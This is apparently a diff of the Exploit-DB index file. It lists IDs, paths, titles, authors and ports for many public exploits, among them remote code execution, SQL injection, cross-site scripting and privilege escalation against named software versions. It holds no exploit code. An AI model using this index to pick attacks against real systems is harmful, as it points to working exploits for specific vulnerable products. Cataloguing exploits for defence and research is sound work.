45257,exploits/windows_x86-64/dos/45257.txt,"Firefox 55.0.3 - Denial of Service (PoC)",2018-08-27,L0RD,dos,windows_x86-64,
45261,exploits/ios/dos/45261.py,"Trend Micro Enterprise Mobile Security 2.0.0.1700 - 'Servidor' Denial of Service (PoC)",2018-08-27,"Luis Martínez",dos,ios,
45263,exploits/linux/dos/45263.sh,"Libpango 1.40.8 - Denial of Service (PoC)",2018-08-27,"Jeffery M",dos,linux,
45268,exploits/linux/dos/45268.txt,"Adobe Flash - AVC Processing Out-of-Bounds Read",2018-08-27,"Google Security Research",dos,linux,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9886,6 +9890,7 @@ id,file,description,date,author,type,platform,port
45147,exploits/linux/local/45147.rb,"Linux Kernel - UDP Fragmentation Offset 'UFO' Privilege Escalation (Metasploit)",2018-08-03,Metasploit,local,linux,
45149,exploits/windows_x86-64/local/45149.cpp,"Fortinet FortiClient 5.2.3 (Windows 10 x64 Creators) - Local Privilege Escalation",2018-08-05,"sickness & mschenk",local,windows_x86-64,
45151,exploits/windows/local/45151.py,"AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)",2018-08-06,bzyo,local,windows,
45163,exploits/windows/local/45163.txt,"Foxit Reader 9.0.1.1049 - Buffer Overflow (ASLR)(DEP)",2018-08-07,"Manoj Ahuje",local,windows,
45165,exploits/windows_x86-64/local/45165.py,"iSmartViewPro 1.5 - 'Device Alias' Buffer Overflow",2018-08-08,"Rodrigo Eduardo Rodriguez",local,windows_x86-64,
45166,exploits/windows_x86-64/local/45166.py,"iSmartViewPro 1.5 - 'Account' Buffer Overflow",2018-08-08,"Alan Joaquín Baeza Meza",local,windows_x86-64,
45171,exploits/windows/local/45171.vb,"Soroush IM Desktop App 0.17.0 - Authentication Bypass",2018-08-09,VortexNeoX64,local,windows,
@ -9900,6 +9905,8 @@ id,file,description,date,author,type,platform,port
45243,exploits/linux/local/45243.txt,"Ghostscript - Multiple Vulnerabilities",2018-08-22,"Google Security Research",local,linux,
45244,exploits/windows/local/45244.txt,"Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation",2018-08-22,"Atredis Partners",local,windows,
45250,exploits/windows_x86/local/45250.py,"StyleWriter 4 1.0 - Denial of Service (PoC)",2018-08-23,"Gionathan Reale",local,windows_x86,
45259,exploits/windows_x86/local/45259.py,"CuteFTP 5.0 - Buffer Overflow",2018-08-27,"Matteo Malvica",local,windows_x86,
45269,exploits/windows/local/45269.rb,"Foxit PDF Reader 9.0.1.1049 - Pointer Overwrite Use-After-Free (Metasploit)",2018-08-27,Metasploit,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16720,7 +16727,12 @@ id,file,description,date,author,type,platform,port
45218,exploits/windows_x86/remote/45218.py,"SEIG SCADA System 9 - Remote Code Execution",2018-08-19,"Alejandro Parodi",remote,windows_x86,12397
45220,exploits/windows_x86/remote/45220.py,"SEIG Modbus 3.4 - Remote Code Execution",2018-08-20,"Alejandro Parodi",remote,windows_x86,
45227,exploits/php/remote/45227.php,"Easylogin Pro 1.3.0 - 'Encryptor.php' Unserialize Remote Code Execution",2018-08-20,mr_me,remote,php,
45233,exploits/linux/remote/45233.py,"OpenSSH 7.7 - Username Enumeration",2018-08-21,"Justin Gardner",remote,linux,
45233,exploits/linux/remote/45233.py,"OpenSSH 2.3 < 7.7 - Username Enumeration",2018-08-21,"Justin Gardner",remote,linux,
45260,exploits/linux/remote/45260.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1)",2018-08-26,"Mazin Ahmed",remote,linux,8080
45262,exploits/multiple/remote/45262.py,"Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2)",2018-08-25,hook-s3c,remote,multiple,8080
45265,exploits/linux/remote/45265.js,"Node.JS - 'node-serialize' Remote Code Execution",2017-02-08,OpSecX,remote,linux,
45272,exploits/multiple/remote/45272.txt,"Electron WebPreferences - Remote Code Execution",2018-08-27,"Matt Austin",remote,multiple,
45273,exploits/unix/remote/45273.rb,"HP Jetdirect - Path Traversal Arbitrary Code Execution (Metasploit)",2018-08-27,Metasploit,remote,unix,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39789,7 +39801,6 @@ id,file,description,date,author,type,platform,port
45160,exploits/windows/webapps/45160.txt,"Open-AudIT Community 2.2.6 - Cross-Site Scripting",2018-08-06,"Ranjeet Jaiswal",webapps,windows,
45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
45073,exploits/linux/webapps/45073.txt,"Synology DiskStation Manager 4.1 - Directory Traversal",2018-07-23,"Berk Dusunur",webapps,linux,
45125,exploits/php/webapps/45125.txt,"Auditor Website 2.0.1 - Cross-Site Scripting",2018-08-02,"Vikas Chaudhary",webapps,php,80
45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
45209,exploits/hardware/webapps/45209.go,"Mikrotik WinBox 6.42 - Credential Disclosure (golang)",2018-08-17,"Maxim Yefimenko",webapps,hardware,
@ -39811,8 +39822,6 @@ id,file,description,date,author,type,platform,port
45167,exploits/linux/webapps/45167.txt,"LG-Ericsson iPECS NMS 30M - Directory Traversal",2018-08-08,"Safak Aslan",webapps,linux,80
45135,exploits/hardware/webapps/45135.txt,"ASUS DSL-N12E_C1 1.1.2.3_345 - Remote Command Execution",2018-08-02,"Fakhri Zulkifli",webapps,hardware,
45136,exploits/windows/webapps/45136.py,"Seq 4.2.476 - Authentication Bypass",2018-08-02,"Daniel Chactoura",webapps,windows,
45140,exploits/php/webapps/45140.txt,"Basic B2B Script 2.0.0 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80
45141,exploits/php/webapps/45141.txt,"Entrepreneur Job Portal Script 3.0.1 - Cross-Site Scripting",2018-08-03,"Vikas Chaudhary",webapps,php,80
45143,exploits/php/webapps/45143.txt,"PHP Template Store Script 3.0.6 - Cross-Site Scripting",2018-08-03,"Sarafraz Khan",webapps,php,80
45145,exploits/xml/webapps/45145.txt,"Vuze Bittorrent Client 5.7.6.0 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
45146,exploits/xml/webapps/45146.txt,"Plex Media Server 1.13.2.5154 - SSDP Processing XML External Entity Injection",2018-08-03,"Chris Moberly",webapps,xml,
@ -39824,6 +39833,7 @@ id,file,description,date,author,type,platform,port
45155,exploits/php/webapps/45155.txt,"CMS ISWEB 3.5.3 - Directory Traversal",2018-08-06,"Thiago Sena",webapps,php,
45156,exploits/php/webapps/45156.txt,"Monstra 3.0.4 - Cross-Site Scripting",2018-08-06,"Nainsi Gupta",webapps,php,80
45158,exploits/java/webapps/45158.txt,"Wavemaker Studio 6.6 - Server-Side Request Forgery",2018-08-06,"Gionathan Reale",webapps,java,
45266,exploits/windows/webapps/45266.txt,"Sentrifugo HRMS 3.2 - 'deptid' SQL Injection",2018-08-27,"Javier Olmedo",webapps,windows,
45164,exploits/php/webapps/45164.txt,"Monstra-Dev 3.0.4 - Cross-Site Request Forgery (Account Hijacking)",2018-08-07,"Nainsi Gupta",webapps,php,
45240,exploits/hardware/webapps/45240.txt,"Geutebrueck re_porter 7.8.974.20 - Credential Disclosure",2018-08-22,"Kamil Suska",webapps,hardware,
45172,exploits/hardware/webapps/45172.rb,"TP-Link C50 Wireless Router 3 - Cross-Site Request Forgery (Remote Reboot)",2018-08-09,Wadeek,webapps,hardware,80
@ -39856,5 +39866,11 @@ id,file,description,date,author,type,platform,port
45252,exploits/hardware/webapps/45252.txt,"Vox TG790 ADSL Router - Cross-Site Request Forgery (Add Admin)",2018-08-24,cakes,webapps,hardware,
45253,exploits/php/webapps/45253.txt,"UltimatePOS 2.5 - Remote Code Execution",2018-08-25,"Renos Nikolaou",webapps,php,
45254,exploits/windows/webapps/45254.txt,"ManageEngine ADManager Plus 6.5.7 - HTML Injection",2018-08-25,"Ismail Tasdelen",webapps,windows,
45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,
45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,
45255,exploits/php/webapps/45255.txt,"WordPress Plugin Gift Voucher 1.0.5 - 'template_id' SQL Injection",2018-08-26,"Renos Nikolaou",webapps,php,80
45256,exploits/windows_x86-64/webapps/45256.txt,"ManageEngine ADManager Plus 6.5.7 - Cross-Site Scripting",2018-08-26,"Ismail Tasdelen",webapps,windows_x86-64,8080
45258,exploits/php/webapps/45258.txt,"Gleez CMS 1.2.0 - Cross-Site Request Forgery (Add Admin)",2018-08-27,GunEggWang,webapps,php,443
45264,exploits/hardware/webapps/45264.txt,"RICOH MP C4504ex Printer - Cross-Site Request Forgery (Add Admin)",2018-08-27,"Ismail Tasdelen",webapps,hardware,80
45267,exploits/php/webapps/45267.py,"LiteCart 2.1.2 - Arbitrary File Upload",2018-08-27,"Haboob Team",webapps,php,
45270,exploits/hardware/webapps/45270.txt,"Seagate Personal Cloud SRN21C 4.3.16.0 / 4.3.18.0 - SQL Injection",2018-08-27,"Yorick Koster",webapps,hardware,
45271,exploits/php/webapps/45271.txt,"Responsive FileManager < 9.13.4 - Directory Traversal",2018-08-27,"Simon Uvarov",webapps,php,80
45274,exploits/php/webapps/45274.html,"WordPress Plugin Plainview Activity Monitor 20161228 - Command Injection",2018-08-27,"Lydéric Lefebvre",webapps,php,80

Can't render this file because it is too large.